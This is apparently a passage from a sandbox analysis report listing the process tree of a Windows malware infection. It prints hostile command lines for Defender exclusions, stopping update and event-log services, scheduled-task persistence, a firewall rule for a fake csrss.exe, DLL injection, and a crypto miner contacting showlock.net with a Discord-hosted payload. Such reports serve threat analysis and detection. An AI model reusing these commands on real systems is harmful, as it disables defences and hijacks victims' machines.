C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s5⤵
- Executes dropped EXE
PID:1592
-
-
-
-
C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5148
-
-
C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5300
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2136
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:1108
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2592
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3328
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:5536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6076
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:4508
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2892
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5904
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1892
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5388 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:6124
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:1864
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:806⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:443 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:80 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --nicehash --http-port 3433 --http-access-token f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --randomx-wrmsr=-17⤵PID:1820
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 18207⤵PID:1192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:5240
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1840
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:336
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe6⤵PID:5356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe6⤵PID:2740
-
-
-
-
-
C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe"C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5168
-
-
C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe"C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 33205⤵
- Program crash
PID:5220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:3720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:3148
-
-
-
-
-
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe"C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:5344 -
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exeC:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6e7f21c8,0x6e7f21d4,0x6e7f21e04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:512
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1752
-
-
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe"C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5344 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240310162828" --session-guid=212f66a5-7f1b-448e-b906-6cdefc4c9881 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A4050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:912 -
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exeC:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x308,0x30c,0x310,0x2d8,0x314,0x6dce21c8,0x6dce21d4,0x6dce21e05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3720
-
-
-
      [4] PID 4332  C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
          - Executes dropped EXE
      [4] PID 5208  C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --version
          - Executes dropped EXE
          - Loads dropped DLL
        [5] PID 5048  C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x288,0x28c,0x290,0x260,0x294,0x1000040,0x100004c,0x1000058
            - Executes dropped EXE
            - Loads dropped DLL
    [3] PID 5576  C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe
        cmdline: "C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Drops file in System32 directory
      [4] PID 1892  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          - Suspicious use of AdjustPrivilegeToken
      [4] PID 5156  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        [5] PID 3712  C:\Windows\system32\wusa.exe
            cmdline: wusa /uninstall /kb:890830 /quiet /norestart
      [4] PID 2248  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop UsoSvc
          - Launches sc.exe
      [4] PID 1604  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
          - Launches sc.exe
      [4] PID 2596  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop wuauserv
          - Launches sc.exe
      [4] PID 6124  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop bits
          - Launches sc.exe
        [5] PID 5480  C:\Windows\System32\Conhost.exe
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      [4] PID 3268  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop dosvc
          - Launches sc.exe
      [4] PID 4564  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
      [4] PID 2140  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
      [4] PID 2364  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
      [4] PID 5140  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
        [5] PID 1752  C:\Windows\System32\Conhost.exe
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      [4] PID 456  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          - Launches sc.exe
      [4] PID 4120  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          - Launches sc.exe
      [4] PID 5648  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop eventlog
          - Launches sc.exe
      [4] PID 4084  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          - Launches sc.exe
    [3] PID 2612  C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe
        cmdline: "C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
        - Executes dropped EXE
      [4] PID 4464  C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp
          cmdline: "C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp" /SL5="$1403A2,1697450,56832,C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
          - Executes dropped EXE
          - Loads dropped DLL
        [5] PID 4764  C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
            cmdline: "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
            - Executes dropped EXE
        [5] PID 2516  C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
            cmdline: "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
            - Executes dropped EXE
    [3] PID 1588  C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe
        cmdline: "C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe"
        - Executes dropped EXE
        - Loads dropped DLL
      [4] PID 2064  C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
          cmdline: C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
          - Executes dropped EXE
        [5] PID 5232  C:\Windows\SysWOW64\WerFault.exe
            cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 1020
            - Program crash
      [4] PID 5488  C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
          cmdline: C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
        [5] PID 5992  C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
          [6] PID 3560  C:\Windows\SysWOW64\chcp.com
              cmdline: chcp 1251
          [6] PID 652  C:\Windows\SysWOW64\schtasks.exe
              cmdline: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
              - DcRat
              - Creates scheduled task(s)
    [3] PID 5000  C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
        cmdline: "C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
        - Executes dropped EXE
      [4] PID 3060  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -nologo -noprofile
      [4] PID 1996  C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
          cmdline: "C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
          - Executes dropped EXE
        [5] PID 1168  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell -nologo -noprofile
            - Modifies data under HKEY_USERS
    [3] PID 3148  C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe
        cmdline: "C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe"
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious behavior: MapViewOfSection
    [3] PID 3052  C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe
        cmdline: "C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Drops file in System32 directory
      [4] PID 5384  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      [4] PID 5428  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        [5] PID 3496  C:\Windows\system32\wusa.exe
            cmdline: wusa /uninstall /kb:890830 /quiet /norestart
      [4] PID 4736  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop UsoSvc
          - Launches sc.exe
      [4] PID 1220  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
          - Launches sc.exe
      [4] PID 3944  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop wuauserv
          - Launches sc.exe
      [4] PID 2064  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop bits
          - Launches sc.exe
      [4] PID 6124  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop dosvc
          - Launches sc.exe
      [4] PID 2960  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      [4] PID 2900  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      [4] PID 1812  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      [4] PID 5472  C:\Windows\system32\powercfg.exe
          cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      [4] PID 2336  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe stop eventlog
          - Launches sc.exe
      [4] PID 5860  C:\Windows\system32\sc.exe
          cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          - Launches sc.exe
    [3] PID 2108  C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
        cmdline: "C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --silent --allusers=0
        - Executes dropped EXE
        - Loads dropped DLL
        - Enumerates connected drives
      [4] PID 6108  C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
          cmdline: C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6c9a21c8,0x6c9a21d4,0x6c9a21e0
          - Executes dropped EXE
          - Loads dropped DLL
      [4] PID 3400  C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --version
          - Executes dropped EXE
          - Loads dropped DLL
  [2] PID 5736  C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
[1] PID 4156  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3908 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:3
[1] PID 536  C:\ProgramData\Google\Chrome\updater.exe
    cmdline: C:\ProgramData\Google\Chrome\updater.exe
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
  [2] PID 5396  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 5348  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    [3] PID 5620  C:\Windows\system32\wusa.exe
        cmdline: wusa /uninstall /kb:890830 /quiet /norestart
  [2] PID 5492  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop UsoSvc
      - Launches sc.exe
  [2] PID 3832  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
      - Launches sc.exe
  [2] PID 5076  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop wuauserv
      - Launches sc.exe
  [2] PID 5600  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop bits
      - Launches sc.exe
  [2] PID 5788  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop dosvc
      - Launches sc.exe
  [2] PID 3912  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  [2] PID 1168  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  [2] PID 844  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  [2] PID 2712  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  [2] PID 508  C:\Windows\system32\conhost.exe
      cmdline: C:\Windows\system32\conhost.exe
  [2] PID 3008  C:\Windows\explorer.exe
      cmdline: explorer.exe
[1] PID 4688  C:\Windows\system32\mmc.exe
    cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
    - Drops file in System32 directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
[1] PID 5788  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85CB.bat" "
  [2] PID 4060  C:\Windows\system32\reg.exe
      cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
[1] PID 3404  C:\Users\Admin\AppData\Local\Temp\DD14.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\DD14.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
  [2] PID 2712  C:\Users\Admin\AppData\Local\Temp\DD14.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\DD14.exe
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
    [3] PID 336  C:\Windows\SysWOW64\icacls.exe
        cmdline: icacls "C:\Users\Admin\AppData\Local\0e5d7f2d-6754-4be0-b473-73a35806b01c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        - Modifies file permissions
    [3] PID 5992  C:\Users\Admin\AppData\Local\Temp\DD14.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
      [4] PID 5392  C:\Users\Admin\AppData\Local\Temp\DD14.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
          - Executes dropped EXE
        [5] PID 536  C:\Windows\SysWOW64\WerFault.exe
            cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 572
            - Program crash
[1] PID 4564  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5388 -ip 5388
[1] PID 3352  C:\Users\Admin\AppData\Local\Temp\8F7.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\8F7.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
  [2] PID 2348  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
[1] PID 6052  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5392 -ip 5392
[1] PID 5488  C:\Users\Admin\AppData\Roaming\cwvffbi
    cmdline: C:\Users\Admin\AppData\Roaming\cwvffbi
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
[1] PID 5880  C:\Windows\windefender.exe
    cmdline: C:\Windows\windefender.exe
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[1] PID 5476  C:\Users\Admin\AppData\Local\Temp\B159.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\B159.exe
    - Executes dropped EXE
[1] PID 5524  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B64C.bat" "
  [2] PID 5720  C:\Windows\system32\reg.exe
